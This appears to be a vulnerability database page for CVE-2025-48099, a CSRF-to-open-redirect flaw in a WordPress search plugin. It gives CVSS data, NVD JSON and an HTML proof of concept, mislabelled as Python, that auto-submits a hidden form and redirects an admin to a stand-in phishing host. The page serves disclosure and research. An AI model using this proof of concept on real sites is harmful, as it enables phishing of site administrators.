Security Vulnerability Report
中文
CVE-2025-48099 CVSS 4.7 MEDIUM

CVE-2025-48099

Published: 2025-10-22 15:15:35
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Code Amp Search & Filter search-filter allows Cross Site Request Forgery.This issue affects Search & Filter: from n/a through <= 1.2.17.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Code Amp Search & Filter (search-filter) <= 1.2.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-48099: Search & Filter Plugin CSRF to Open Redirect PoC --> <!-- Save as exploit.html and host on attacker-controlled server --> <!-- Victim must be logged in as WordPress admin and visit this page --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Please wait...</h1> <!-- Auto-submitting form that triggers CSRF --> <form id="csrf-form" method="GET" action="http://target-wordpress-site.com/?s=&post_type=product&redirect_to=https://evil-attacker.com/phishing"> <!-- Parameters targeting Search & Filter plugin endpoint --> <input type="hidden" name="action" value="search_filter_redirect" /> <input type="hidden" name="redirect_url" value="https://evil-attacker.com/phishing" /> <input type="hidden" name="search_filter_id" value="1" /> </form> <script> // Auto-submit the form when page loads document.getElementById('csrf-form').submit(); </script> <!-- Alternative: Image-based CSRF trigger --> <!-- <img src="http://target-site.com/wp-admin/admin.php?page=search-filter&action=redirect&url=https://evil.com" style="display:none" /> --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48099", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:34.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Code Amp Search & Filter search-filter allows Cross Site Request Forgery.This issue affects Search & Filter: from n/a through <= 1.2.17."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/search-filter/vulnerability/wordpress-search-filter-plugin-1-2-17-cross-site-request-forgery-csrf-to-open-redirect-vulnerability?_s_id=cve", "source": "[email protected]"}]}}